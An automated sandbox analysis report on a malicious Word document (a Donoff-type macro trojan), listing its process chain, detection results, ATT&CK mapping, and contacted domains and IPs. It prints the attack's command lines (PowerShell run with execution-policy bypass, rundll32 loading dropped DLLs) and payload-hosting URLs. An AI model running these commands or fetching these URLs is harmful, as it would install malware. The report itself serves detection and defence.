                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1708Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_000007FF00260F5C sldt word ptr [eax]3_2_000007FF00260F5C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: powershell.exe, 00000003.00000002.480149738.00000000003F2000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Yara detected Powershell download and executeShow sources
                Source: Yara matchFile source: sample.doc.doc, type: SAMPLE
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\www.ps1, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, type: DROPPED
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1Jump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldrJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldrJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldrJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldrJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldrJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldrJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldrJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldrJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldrJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldrJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsCommand and Scripting Interpreter1Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting52Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonScripting52Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 528758 Sample: sample.doc.vir Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 53 Multi AV Scanner detection for domain / URL 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 13 other signatures 2->59 8 WINWORD.EXE 436 29 2->8         started        process3 file4 33 C:\Users\user\AppData\Roaming\www.txt, ASCII 8->33 dropped 35 C:\Users\user\AppData\Roaming\www.ps1, ASCII 8->35 dropped 37 C:\Users\user\...\~DF77272A7F6F18B150.TMP, Composite 8->37 dropped 39 2 other malicious files 8->39 dropped 11 cscript.exe 1 8->11         started        process5 process6 13 powershell.exe 16 11 11->13         started        17 cmd.exe 11->17         started        19 cmd.exe 11->19         started        21 3 other processes 11->21 dnsIp7 47 yoowi.net 210.211.111.87, 443, 49170 VTDC-AS-VNVietel-CHTCompamyLtdVN Viet Nam 13->47 49 gruasingenieria.pe 192.185.17.114, 443, 49169 UNIFIEDLAYER-AS-1US United States 13->49 51 3 other IPs or domains 13->51 41 C:\ProgramData\www4.dll, HTML 13->41 dropped 43 C:\ProgramData\www3.dll, HTML 13->43 dropped 45 C:\ProgramData\www1.dll, HTML 13->45 dropped 23 rundll32.exe 17->23         started        25 rundll32.exe 19->25         started        27 rundll32.exe 21->27         started        29 rundll32.exe 21->29         started        31 rundll32.exe 21->31         started        file8 process9

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                sample.doc.doc50%VirustotalBrowse
                sample.doc.doc60%ReversingLabsDocument-Word.Trojan.Donoff
                sample.doc.doc100%AviraW97M/Agent.9761513

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                ghapan.com9%VirustotalBrowse
                yoowi.net9%VirustotalBrowse
                chaturanga.groopy.com9%VirustotalBrowse
                gruasingenieria.pe7%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://ocsp.entrust.net030%URL Reputationsafe
                https://ghapan.com/Kdg73onC3o0%Avira URL Cloudsafe
                https://yoowi.net0%Avira URL Cloudsafe
                https://yoowi.net/tDzEJ8uVGwdj/10%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                https://gruasingenieria.pe/LUS1N0%Avira URL Cloudsafe
                https://ghapan.com/Kdg73onC3oQ/00%Avira URL Cloudsafe
                https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi0%Avira URL Cloudsafe
                https://lotolands.com/JtaTAt40%Avira URL Cloudsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                https://gruasingenieria.pe/LUS1NTVui6/090921.htmlPE0%Avira URL Cloudsafe
                https://ghapan.c0%Avira URL Cloudsafe
                https://gruasingenieria.pe/LUS1NTVui6/090921.html0%Avira URL Cloudsafe
                https://ghapan.com/Kdg73onC3oQ0%Avira URL Cloudsafe
                https://chaturanga.groopy.com0%Avira URL Cloudsafe
                https://ghapan.com/Kdg73onC3oQ/090921.html0%Avira URL Cloudsafe
                http://www.%s.comPA0%URL Reputationsafe
                https://chaturanga.groopy.com/7SEZBnhMLW/130921.html0%Avira URL Cloudsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                https://chaturanga.groopy.comp0%Avira URL Cloudsafe
                https://ghapan.comp0%Avira URL Cloudsafe
                https://yoowi.ne0%Avira URL Cloudsafe
                http://servername/isapibackend.dll0%Avira URL Cloudsafe
                https://yoowi.net/tDzEJ8uVGwd0%Avira URL Cloudsafe
                https://lotolands.com0%Avira URL Cloudsafe
                https://gruasingenieria.pe0%Avira URL Cloudsafe
                https://lotolands.com/JtaTAt4E0%Avira URL Cloudsafe
                https://lotolands.com/JtaTAt4Ej/130921.html0%Avira URL Cloudsafe
                https://ghapan.com0%Avira URL Cloudsafe
                https://ghapan.com/Kdg73onC3oQ/090921.htmlPE0%Avira URL Cloudsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                https://lotolands.com/JtaTAt4Ej/130921.htmlPE0%Avira URL Cloudsafe
                https://yoowi.net/tDzEJ8uVGwdj/130921.html0%Avira URL Cloudsafe
                https://chaturanga.groopy.com/7S0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                https://chaturanga.groopy.com/7SEZBnhMLW/130921.htmlPE0%Avira URL Cloudsafe
                https://lotolands.com/JtaTAt4Ej/0%Avira URL Cloudsafe
                https://yoowi.net/tDzEJ8uVGwdj0%Avira URL Cloudsafe
                https://yoowi.net/tDzEJ8uVGwdj/130921.htmlPE0%Avira URL Cloudsafe
                https://gruasingenieria.pe/LU0%Avira URL Cloudsafe
                https://ghapan.com/cgi-sys/suspendedpage.cgi0%Avira URL Cloudsafe
                https://gruasingenieria.pe/LUS0%Avira URL Cloudsafe
                https://chaturanga.groopy.com/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ghapan.com
                136.243.74.161
                truetrueunknown
                yoowi.net
                210.211.111.87
                truetrueunknown
                chaturanga.groopy.com
                143.95.80.83
                truetrueunknown
                gruasingenieria.pe
                192.185.17.114
                truetrueunknown
                lotolands.com
                unknown
                unknowntrue
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgifalse
                  • Avira URL Cloud: safe
                  unknown
                  https://gruasingenieria.pe/LUS1NTVui6/090921.htmltrue
                  • Avira URL Cloud: safe
                  unknown
                  https://ghapan.com/Kdg73onC3oQ/090921.htmltrue
                  • Avira URL Cloud: safe
                  unknown
                  https://chaturanga.groopy.com/7SEZBnhMLW/130921.htmltrue
                  • Avira URL Cloud: safe
                  unknown
                  https://yoowi.net/tDzEJ8uVGwdj/130921.htmltrue
                  • Avira URL Cloud: safe
                  unknown
                  https://ghapan.com/cgi-sys/suspendedpage.cgitrue
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmpfalse
                    high
                    http://ocsp.entrust.net03powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ghapan.com/Kdg73onC3opowershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://yoowi.netpowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://yoowi.net/tDzEJ8uVGwdj/1powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://gruasingenieria.pe/LUS1Npowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://ghapan.com/Kdg73onC3oQ/0powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://lotolands.com/JtaTAt4powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.icra.org/vocabulary/.powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://gruasingenieria.pe/LUS1NTVui6/090921.htmlPEpowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ghapan.cpowershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://ghapan.com/Kdg73onC3oQpowershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://chaturanga.groopy.compowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://investor.msn.com/powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmpfalse
                      high
                      http://www.%s.comPAcscript.exe, 00000001.00000002.474455251.0000000003CB0000.00000002.00020000.sdmp, powershell.exe, 00000003.00000002.480445007.0000000002450000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      low
                      http://ocsp.entrust.net0Dpowershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://chaturanga.groopy.comppowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ghapan.comppowershell.exe, 00000003.00000002.489124422.000000000386C000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://yoowi.nepowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://servername/isapibackend.dllcscript.exe, 00000001.00000002.474013786.0000000001D00000.00000002.00020000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://www.windows.com/pctv.rundll32.exe, 00000011.00000002.490483837.0000000001B20000.00000002.00020000.sdmpfalse
                        high
                        https://yoowi.net/tDzEJ8uVGwdpowershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://lotolands.compowershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://investor.msn.compowershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmpfalse
                          high
                          http://crl.entrust.net/server1.crl0powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpfalse
                            high
                            https://gruasingenieria.pepowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://lotolands.com/JtaTAt4Epowershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://lotolands.com/JtaTAt4Ej/130921.htmlpowershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://ghapan.compowershell.exe, 00000003.00000002.489114799.0000000003865000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://ghapan.com/Kdg73onC3oQ/090921.htmlPEpowershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.hotmail.com/oepowershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmpfalse
                              high
                              https://lotolands.com/JtaTAt4Ej/130921.htmlPEpowershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmpfalse
                                high
                                https://chaturanga.groopy.com/7Spowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.cscript.exe, 00000001.00000002.474455251.0000000003CB0000.00000002.00020000.sdmp, powershell.exe, 00000003.00000002.480445007.0000000002450000.00000002.00020000.sdmpfalse
                                  high
                                  https://chaturanga.groopy.com/7SEZBnhMLW/130921.htmlPEpowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://lotolands.com/JtaTAt4Ej/powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://yoowi.net/tDzEJ8uVGwdjpowershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://yoowi.net/tDzEJ8uVGwdj/130921.htmlPEpowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gruasingenieria.pe/LUpowershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gruasingenieria.pe/LUSpowershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://chaturanga.groopy.com/powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://secure.comodo.com/CPS0powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmpfalse
                                    high
                                    http://crl.entrust.net/2048ca.crl0powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpfalse
                                      high

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      136.243.74.161
                                      ghapan.comGermany
                                      24940HETZNER-ASDEtrue
                                      143.95.80.83
                                      chaturanga.groopy.comUnited States
                                      62729ASMALLORANGE1UStrue
                                      192.185.17.114
                                      gruasingenieria.peUnited States
                                      46606UNIFIEDLAYER-AS-1UStrue
                                      210.211.111.87
                                      yoowi.netViet Nam
                                      38731VTDC-AS-VNVietel-CHTCompamyLtdVNtrue

                                      General Information

                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                      Analysis ID:528758
                                      Start date:25.11.2021
                                      Start time:18:38:30
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 6m 57s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:sample.doc.vir (renamed file extension from vir to doc)
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:21
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • GSI enabled (VBA)
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winDOC@25/19@5/4
                                      EGA Information:Failed
                                      HDC Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 3
                                      • Number of non-executed functions: 1
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      Show All
